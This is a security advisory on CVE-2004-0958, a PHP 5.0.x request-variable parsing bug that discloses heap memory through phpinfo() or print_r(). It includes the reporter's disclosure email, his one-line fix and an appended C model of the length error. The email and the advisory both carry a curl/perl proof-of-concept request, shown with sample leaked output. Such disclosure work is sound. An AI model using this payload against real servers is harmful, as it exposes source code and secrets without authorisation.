


Category:   Application (Generic)  >   PHP
Vendors:   PHP Group
PHP Array Parsing Error in php_variables May Disclose Memory Contents via phpinfo()
SecurityTracker Alert ID:  1011279
CVE Reference:   CVE-2004-0958
Updated:  Oct 19 2004
Original Entry Date:  Sep 15 2004
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.0 - 5.0.1
Description:   A vulnerability was reported in PHP's parsing of request variables; phpinfo(), or any script that prints the request array, displays the result. A remote user may be able to obtain memory contents.

Stefano Di Paola reported that an array parsing error in 'php_variables.c' may cause the system to display arbitrary memory contents. A remote user can trigger the flaw by sending a GET, POST, or COOKIE variable whose name contains an unterminated nested array index (an opening square bracket with no matching closing bracket, such as abc[a][).

A demonstration exploit is shown [where 'phpinfo.php' contains the phpinfo() function]:

$ curl "" -d `perl -e 'print "f"x100;print "[g][=1"'`

Alternatively, the target script may contain a print_r($_REQUEST) call instead of phpinfo().

Impact:   A remote user may be able to obtain arbitrary heap memory contents, which the reporter observed to include fragments of PHP source code.
Solution:   A fix is available via CVS. The reporter's one-line fix is to replace strlen(var) with strlen(index) in the unterminated-bracket branch of main/php_variables.c (around line 136 in PHP 5.0.1) and recompile.
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  PHP Vulnerability N. 1

Hi all,
This summer I have been playing around with some PHP issues
and got some PHP vulnerabilities.

Let's go for the first one:

Title: php(super)info().
Affected: PHP <= 5.0.1
Not Affected: it seems PHP <= 4.1.2
Vulnerability Type:  Exposure of sensitive information
Vendor Status: Fix released on


Bad array parsing in php_variables.c could lead to showing arbitrary memory
content such as pieces of PHP code and other data.
This affects all GET, POST or COOKIE variables.


By appending a [ (open square bracket) to a GET/POST/COOKIE variable array,
like abc[a][, the length of the 'a' array element is set to the length of
the variable name, strlen("abc").

$ curl "" -d `perl -e 'print "f"x100;print "[g][=1"'`

where phpinfo.php is:

or some PHP file containing a print_r() call:

it will print output similar to:
      ffffffffffffffffffffffffffffffffffffffff] => Array
\0\0\0\0] => 1

As you have probably noticed, all the garbage shown is memory
content that could be anything (on the heap, I suppose).

I have tried some requests and it exposes some pieces of PHP code sometimes.

The authors were contacted and they released a fix for this problem.

The problem is easy to fix.

Find and replace, around line 136 for PHP 5.0.1 in main/php_variables.c,

index_len = var_len = strlen(var);

with

index_len = var_len = strlen(index);

and compile again.

But if you're lazy, the patch can be found in CVS.


Stefano Di Paola

Stefano Di Paola
Software Engineer
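
The length confusion described in the advisory text and in the message above (the unterminated '[' branch taking its key length from strlen(var) rather than strlen(index)), modelled in C. This is an added example and not code from the advisory, from the message, or from PHP itself: it re-implements only the name-splitting loop of main/php_variables.c in cut-down form, so the function names parse_name, copy_key and secret_bytes_in_key, the fixed-size arena, and the constructed "secret" string standing in for whatever happens to follow the name on the heap are all assumptions of this example. The NULL guard on index in the fixed branch is also an addition of the model, so that a name such as abc[][ does not crash it. The PoC name is the page's own: 100 x 'f' followed by "[g][".

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ARENA_SIZE 256
#define NAME_LEN   104          /* 100 x 'f' + "[g][" */

/* What the parser hands to the symbol-table update for one variable name. */
typedef struct {
    const char *index;      /* final key, pointing inside the name buffer */
    size_t      index_len;  /* length the parser believes that key has */
} parsed_name;

/* Cut-down model (not PHP's code) of the name-splitting loop in
 * main/php_variables.c.  fixed == 0 reproduces the 5.0.1 branch (strlen(var));
 * fixed == 1 applies the message's replacement (strlen(index)).  The NULL
 * guard on index is an addition of this model for names like "abc[][". */
static parsed_name parse_name(char *var, int fixed)
{
    char *p, *ip = NULL, *index, *index_s;
    size_t index_len, new_idx_len;
    int is_array = 0;
    parsed_name out;

    /* the first '[' terminates the base variable name */
    for (p = var; *p; p++) {
        if (*p == '[') { is_array = 1; ip = p; *p = '\0'; break; }
    }
    index = var;
    index_len = strlen(var);

    while (is_array) {
        ip++;
        index_s = ip;
        new_idx_len = 0;
        if (*ip == ']') {
            index_s = NULL;                  /* "[]": append under the next integer key */
        } else {
            ip = strchr(ip, ']');
            if (ip == NULL) {
                /* unterminated '[': rewritten to '_', then the value is stored
                 * under the *current* index, but with a length taken from... */
                *(index_s - 1) = '_';
                if (fixed)
                    index_len = index ? strlen(index) : 0;  /* ...the index (fix) */
                else
                    index_len = strlen(var);                /* ...the base name (5.0.1) */
                break;                                      /* goto plain_var */
            }
            *ip = '\0';
            new_idx_len = strlen(index_s);
        }
        index = index_s;
        index_len = new_idx_len;
        ip++;
        if (*ip == '[') { is_array = 1; *ip = '\0'; } else { is_array = 0; }
    }

    out.index = index;
    out.index_len = index_len;
    return out;
}

/* Stand-in for the symbol-table update: it trusts index_len and copies that
 * many bytes of the key out.  Returns the number of bytes copied. */
static size_t copy_key(const parsed_name *pn, char *out, size_t out_size)
{
    size_t n = pn->index_len < out_size ? pn->index_len : out_size;
    if (pn->index == NULL) return 0;
    memcpy(out, pn->index, n);
    return n;
}

/* Parse the page's PoC name with a constructed secret placed directly after it,
 * as adjacent heap data would be.  Returns how many bytes of that secret end up
 * inside the key (0 = no disclosure) and reports the key length via key_len_out. */
size_t secret_bytes_in_key(int fixed, size_t *key_len_out)
{
    static const char secret[] = "<?php $db_password = 'hunter2'; ?>";  /* constructed */
    char arena[ARENA_SIZE], key[ARENA_SIZE];
    const char *secret_start = arena + NAME_LEN + 1;
    size_t n, i, count = 0;
    parsed_name pn;

    memset(arena, 0, sizeof arena);
    memset(arena, 'f', 100);
    memcpy(arena + 100, "[g][", 4);                 /* name = "fff...f[g][" */
    memcpy(arena + NAME_LEN + 1, secret, sizeof secret);

    pn = parse_name(arena, fixed);
    n = copy_key(&pn, key, sizeof key);
    if (key_len_out) *key_len_out = n;

    for (i = 0; i < n; i++) {
        const char *src = pn.index + i;
        if (src >= secret_start && src < secret_start + sizeof secret - 1) count++;
    }
    return count;
}

int main(void)
{
    size_t klen, leaked;
    leaked = secret_bytes_in_key(0, &klen);
    printf("5.0.1 logic: key length %zu, secret bytes inside key: %zu\n", klen, leaked);
    leaked = secret_bytes_in_key(1, &klen);
    printf("fixed logic: key length %zu, secret bytes inside key: %zu\n", klen, leaked);
    return 0;
}
```

With the 5.0.1 branch the key for "g" is reported as 100 bytes long, so the copy runs 99 bytes past the one-byte index string and the whole constructed secret lands in the key, which is exactly the NUL-laden garbage print_r() shows on the page; with strlen(index) the key is the single byte "g". The arena keeps every read inside memory the example owns, so it demonstrates the length bug without itself invoking undefined behaviour.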

